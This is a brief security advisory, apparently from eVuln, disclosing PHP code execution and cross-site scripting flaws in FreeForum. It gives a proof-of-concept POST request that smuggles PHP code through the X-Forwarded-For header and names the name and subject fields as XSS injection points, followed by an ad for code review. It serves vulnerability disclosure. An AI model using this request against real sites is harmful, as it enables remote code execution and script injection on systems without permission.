PoC/Exploit for PHP Code Execution and Multiple XSS in FreeForum

Published Proof of Concept code - PHP Code Execution and Multiple XSS in FreeForum.

Description
Available
Solution
Available

1. PHP Code Execution Example.

HTTP Query:

  • POST /freeforum/index.php HTTP/1.0
  • Host: [host]
  • X-Forwarded-For: anyIP<? [code] ?>
  • Content-Length: 91
  •  
  • name=qqq&email=qqq@qqq.com&subject=qqq&text=qqq&mode=postanswer&thread=1&cat=1&submit=Add

2. Cross-Site Scripting Example.

URL: http://[host]/freeforum/index.php

Your name: [XSS]

Subject: [XSS]

Order Source Code Review made by eVuln team

You may order source code analysis of your website made by eVuln team.The work will be done by experts in website security.

Advisories by vuln type